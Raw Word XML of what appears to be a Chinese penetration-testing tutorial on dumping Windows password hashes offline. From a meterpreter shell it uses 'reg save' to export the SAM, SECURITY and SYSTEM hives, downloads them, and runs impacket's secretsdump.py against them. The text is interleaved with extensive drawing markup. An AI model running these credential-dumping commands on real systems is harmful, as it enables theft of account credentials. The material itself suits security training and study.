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53.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7077" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7077;width:82;height:322" coordorigin="1177,7077" coordsize="82,322" path="m1217,7093l1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7093,1217,7094,1217,7094,1217,7094,1217,7094,1217,7094,1217,7095,1217,7095,1217,7095,1217,7096,1217,7096,1217,7096,1217,7097,1217,7097,1217,7098,1217,7098,1217,7099,1217,7100,1217,7100,1217,7101,1217,7102,1217,7102,1217,7103,1217,7104,1217,7105,1217,7106,1217,7107,1217,7108,1217,7109,1217,7110,1217,7111,1217,7112,1217,7114,1217,7115,1217,7116,1217,7118,1217,7119,1217,7121,1217,7122,1217,7124,1217,7126,1217,7127,1217,7129,1217,7131,1217,7133,1217,7135,1217,7137,1217,7139,1217,7141,1217,7144,1217,7146,1217,7149,1217,7151,1217,7154,1217,7156,1217,7159,1217,7162,1217,7165,1217,7168,1217,7171,1217,7174,1217,7177,1217,7180,1217,7184,1217,7187,1217,7191,1217,7194,1217,7198,1217,7202,1217,7206,1217,7210,1217,7214,1217,7218,1217,7222,1217,7227,1217,7231,1217,7236,1217,7241,1217,7245,1217,7250,1217,7255,1217,7260,1217,7265,1217,7271,1217,7276,1217,7282,1217,7287,1217,7293,1217,7299,1217,7305,1217,7311,1217,7317,1217,7323,1217,7330,1217,7336,1217,7343,1217,7350,1217,7356,1217,7363,1217,7371,1217,7378,1217,7385,1217,7393e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:368.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7377" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7377;width:82;height:322" coordorigin="1177,7377" coordsize="82,322" path="m1217,7393l1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7393,1217,7394,1217,7394,1217,7394,1217,7394,1217,7394,1217,7395,1217,7395,1217,7395,1217,7396,1217,7396,1217,7396,1217,7397,1217,7397,1217,7398,1217,7398,1217,7399,1217,7399,1217,7400,1217,7400,1217,7401,1217,7402,1217,7402,1217,7403,1217,7404,1217,7405,1217,7406,1217,7407,1217,7408,1217,7409,1217,7410,1217,7411,1217,7412,1217,7414,1217,7415,1217,7416,1217,7418,1217,7419,1217,7421,1217,7422,1217,7424,1217,7426,1217,7427,1217,7429,1217,7431,1217,7433,1217,7435,1217,7437,1217,7439,1217,7442,1217,7444,1217,7446,1217,7449,1217,7451,1217,7454,1217,7456,1217,7459,1217,7462,1217,7465,1217,7468,1217,7471,1217,7474,1217,7477,1217,7481,1217,7484,1217,7487,1217,7491,1217,7495,1217,7498,1217,7502,1217,7506,1217,7510,1217,7514,1217,7518,1217,7523,1217,7527,1217,7531,1217,7536,1217,7541,1217,7545,1217,7550,1217,7555,1217,7560,1217,7566,1217,7571,1217,7576,1217,7582,1217,7587,1217,7593,1217,7599,1217,7605,1217,7611,1217,7617,1217,7623,1217,7630,1217,7636,1217,7643,1217,7650,1217,7657,1217,7664,1217,7671,1217,7678,1217,7685,1217,7693e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:383.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7677" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:7677;width:82;height:322" coordorigin="1177,7677" coordsize="82,322" path="m1217,7693l1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7693,1217,7694,1217,7694,1217,7694,1217,7694,1217,7694,1217,7695,1217,7695,1217,7695,1217,7695,1217,7696,1217,7696,1217,7696,1217,7697,1217,7697,1217,7698,1217,7698,1217,7699,1217,7699,1217,7700,1217,7701,1217,7701,1217,7702,1217,7703,1217,7703,1217,7704,1217,7705,1217,7706,1217,7707,1217,7708,1217,7709,1217,7710,1217,7711,1217,7713,1217,7714,1217,7715,1217,7717,1217,7718,1217,7719,1217,7721,1217,7723,1217,7724,1217,7726,1217,7728,1217,7729,1217,7731,1217,7733,1217,7735,1217,7737,1217,7740,1217,7742,1217,7744,1217,7746,1217,7749,1217,7751,1217,7754,1217,7757,1217,7759,1217,7762,1217,7765,1217,7768,1217,7771,1217,7774,1217,7777,1217,7781,1217,7784,1217,7788,1217,7791,1217,7795,1217,7798,1217,7802,1217,7806,1217,7810,1217,7814,1217,7818,1217,7823,1217,7827,1217,7832,1217,7836,1217,7841,1217,7846,1217,7850,1217,7855,1217,7861,1217,7866,1217,7871,1217,7876,1217,7882,1217,7888,1217,7893,1217,7899,1217,7905,1217,7911,1217,7917,1217,7924,1217,7930,1217,7936,1217,7943,1217,7950,1217,7957,1217,7964,1217,7971,1217,7978,1217,7986,1217,7993e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:201.600pt;width:304.800pt;height:91.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:419.400pt;width:287.399pt;height:225.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:662.400pt;width:420.600pt;height:39.6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很多环境下，不允许上传或者使用mimikatz。而针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对非域控的单机离线提取hash显得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尤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为重要。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在meterpreter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shell命令切到交互式cmd命令。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reg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save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="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方式使得需要下载的目标机hash文件更小。</w:t>
      </w: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reg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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HKLM\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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sys.hiv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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HKLM\SAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sam.hiv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reg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> 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hklm\security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>security.hiv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me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terpreter下自带download功能。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456.500pt;width:0.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,9130" coordsize="10,690">
        <v:shape style="position:absolute;left:10390;top:9130;width:10;height:690" coordorigin="10390,9130" coordsize="10,690" path="m10402,9149l10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9149,10402,9150,10402,9150,10402,9150,10402,9151,10402,9151,10402,9151,10402,9152,10402,9152,10402,9153,10402,9153,10402,9154,10402,9155,10402,9156,10402,9156,10402,9157,10402,9158,10402,9159,10402,9161,10402,9162,10402,9163,10402,9164,10402,9166,10402,9167,10402,9169,10402,9171,10402,9172,10402,9174,10402,9176,10402,9178,10402,9180,10402,9183,10402,9185,10402,9188,10402,9190,10402,9193,10402,9196,10402,9199,10402,9202,10402,9205,10402,9208,10402,9212,10402,9215,10402,9219,10402,9223,10402,9227,10402,9231,10402,9235,10402,9240,10402,9244,10402,9249,10402,9254,10402,9259,10402,9264,10402,9269,10402,9275,10402,9280,10402,9286,10402,9292,10402,9298,10402,9305,10402,9311,10402,9318,10402,9325,10402,9332,10402,9339,10402,9346,10402,9354,10402,9362,10402,9370,10402,9378,10402,9386,10402,9395,10402,9404,10402,9413,10402,9422,10402,9431,10402,9441,10402,9451,10402,9461,10402,9471,10402,9481,10402,9492,10402,9503,10402,9514,10402,9526,10402,9537,10402,9549,10402,9562,10402,9574,10402,9587,10402,9599,10402,9613,10402,9626,10402,9640,10402,9653,10402,9668,10402,9682,10402,9697,10402,9712,10402,9727,10402,9742,10402,9758,10402,9774,10402,9790,10402,9807,10402,9824e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:456.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9130" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:9130;width:8990;height:690" coordorigin="1490,9130" coordsize="8990,690" path="m1510,9149l1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1511,9149,1512,9149,1512,9149,1514,9149,1515,9149,1517,9149,1519,9149,1521,9149,1524,9149,1528,9149,1532,9149,1536,9149,1541,9149,1546,9149,1552,9149,1559,9149,1566,9149,1575,9149,1583,9149,1593,9149,1603,9149,1615,9149,1627,9149,1640,9149,1654,9149,1668,9149,1684,9149,1701,9149,1719,9149,1738,9149,1758,9149,1780,9149,1802,9149,1826,9149,1851,9149,1877,9149,1904,9149,1933,9149,1963,9149,1995,9149,2028,9149,2063,9149,2099,9149,2136,9149,2175,9149,2216,9149,2259,9149,2303,9149,2348,9149,2396,9149,2445,9149,2496,9149,2549,9149,2604,9149,2660,9149,2719,9149,2779,9149,2841,9149,2906,9149,2972,9149,3041,9149,3112,9149,3184,9149,3259,9149,3336,9149,3416,9149,3498,9149,3582,9149,3668,9149,3757,9149,3848,9149,3941,9149,4037,9149,4136,9149,4236,9149,4340,9149,4446,9149,4555,9149,4666,9149,4780,9149,4897,9149,5017,9149,5139,9149,5264,9149,5392,9149,5523,9149,5657,9149,5793,9149,5933,9149,6076,9149,6222,9149,6370,9149,6522,9149,6677,9149,6835,9149,6997,9149,7161,9149,7329,9149,7500,9149,7675,9149,7853,9149,8034,9149,8219,9149,8407,9149,8598,9149,8793,9149,8992,9149,9194,9149,9400,9149,9609,9149,9823,9149,10039,9149,10260,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9150,10484,9150,10484,9150,10484,9151,10484,9151,10484,9151,10484,9152,10484,9152,10484,9153,10484,9153,10484,9154,10484,9155,10484,9156,10484,9156,10484,9157,10484,9158,10484,9159,10484,9161,10484,9162,10484,9163,10484,9164,10484,9166,10484,9167,10484,9169,10484,9171,10484,9172,10484,9174,10484,9176,10484,9178,10484,9180,10484,9183,10484,9185,10484,9188,10484,9190,10484,9193,10484,9196,10484,9199,10484,9202,10484,9205,10484,9208,10484,9212,10484,9215,10484,9219,10484,9223,10484,9227,10484,9231,10484,9235,10484,9240,10484,9244,10484,9249,10484,9254,10484,9259,10484,9264,10484,9269,10484,9275,10484,9280,10484,9286,10484,9292,10484,9298,10484,9305,10484,9311,10484,9318,10484,9325,10484,9332,10484,9339,10484,9346,10484,9354,10484,9362,10484,9370,10484,9378,10484,9386,10484,9395,10484,9404,10484,9413,10484,9422,10484,9431,10484,9441,10484,9451,10484,9461,10484,9471,10484,9481,10484,9492,10484,9503,10484,9514,10484,9526,10484,9537,10484,9549,10484,9562,10484,9574,10484,9587,10484,9599,10484,9613,10484,9626,10484,9640,10484,9653,10484,9668,10484,9682,10484,9697,10484,9712,10484,9727,10484,9742,10484,9758,10484,9774,10484,9790,10484,9807,10484,9824,10484,9824,10484,9824,10484,9824,10484,9824,10484,9824,10484,9824,10483,9824,10482,9824,10482,9824,10480,9824,10479,9824,10477,9824,10475,9824,10473,9824,10470,9824,10466,9824,10462,9824,10458,9824,10453,9824,10448,9824,10442,9824,10435,9824,10428,9824,10419,9824,10411,9824,10401,9824,10391,9824,10379,9824,10367,9824,10354,9824,10340,9824,10326,9824,10310,9824,10293,9824,10275,9824,10256,9824,10236,9824,10215,9824,10192,9824,10168,9824,10143,9824,10117,9824,10090,9824,10061,9824,10031,9824,9999,9824,9966,9824,9931,9824,9895,9824,9858,9824,9819,9824,9778,9824,9735,9824,9691,9824,9646,9824,9598,9824,9549,9824,9498,9824,9445,9824,9391,9824,9334,9824,9275,9824,9215,9824,9153,9824,9088,9824,9022,9824,8953,9824,8883,9824,8810,9824,8735,9824,8658,9824,8578,9824,8497,9824,8413,9824,8326,9824,8238,9824,8146,9824,8053,9824,7957,9824,7859,9824,7758,9824,7654,9824,7548,9824,7439,9824,7328,9824,7214,9824,7097,9824,6977,9824,6855,9824,6730,9824,6602,9824,6471,9824,6337,9824,6201,9824,6061,9824,5918,9824,5773,9824,5624,9824,5472,9824,5317,9824,5159,9824,4997,9824,4833,9824,4665,9824,4494,9824,4319,9824,4141,9824,3960,9824,3776,9824,3587,9824,3396,9824,3201,9824,3002,9824,2800,9824,2594,9824,2385,9824,2172,9824,1955,9824,1734,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9824,1510,9823,1510,9823,1510,9823,1510,9823,1510,9823,1510,9822,1510,9822,1510,9822,1510,9821,1510,9821,1510,9820,1510,9820,1510,9819,1510,9818,1510,9818,1510,9817,1510,9816,1510,9815,1510,9814,1510,9813,1510,9812,1510,9811,1510,9810,1510,9808,1510,9807,1510,9805,1510,9804,1510,9802,1510,9800,1510,9798,1510,9796,1510,9794,1510,9792,1510,9790,1510,9787,1510,9785,1510,9782,1510,9780,1510,9777,1510,9774,1510,9771,1510,9768,1510,9764,1510,9761,1510,9757,1510,9754,1510,9750,1510,9746,1510,9742,1510,9737,1510,9733,1510,9728,1510,9724,1510,9719,1510,9714,1510,9709,1510,9703,1510,9698,1510,9692,1510,9686,1510,9681,1510,9674,1510,9668,1510,9662,1510,9655,1510,9648,1510,9641,1510,9634,1510,9626,1510,9619,1510,9611,1510,9603,1510,9595,1510,9586,1510,9578,1510,9569,1510,9560,1510,9551,1510,9541,1510,9532,1510,9522,1510,9512,1510,9502,1510,9491,1510,9480,1510,9469,1510,9458,1510,9447,1510,9435,1510,9423,1510,9411,1510,9399,1510,9386,1510,9373,1510,9360,1510,9347,1510,9333,1510,9319,1510,9305,1510,9291,1510,9276,1510,9261,1510,9246,1510,9230,1510,9214,1510,9198,1510,9182,1510,9165,1510,9149e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:456.600pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:424.800pt;height:204.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:271.800pt;width:195.600pt;height:60.6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离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>线提取：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4285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本季用到的是impacket的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="51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secretsdump.py。Kali默认路径：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/root/impacket/exampl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es/secretsdump.py</w:t>
      </w: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命</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>令如下：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tmp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/root/impacket/examples/secretsdump.py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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐sam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sa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m.hiv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‐security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security.hiv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‐system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sys.hiv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LOCAL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397.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:299.399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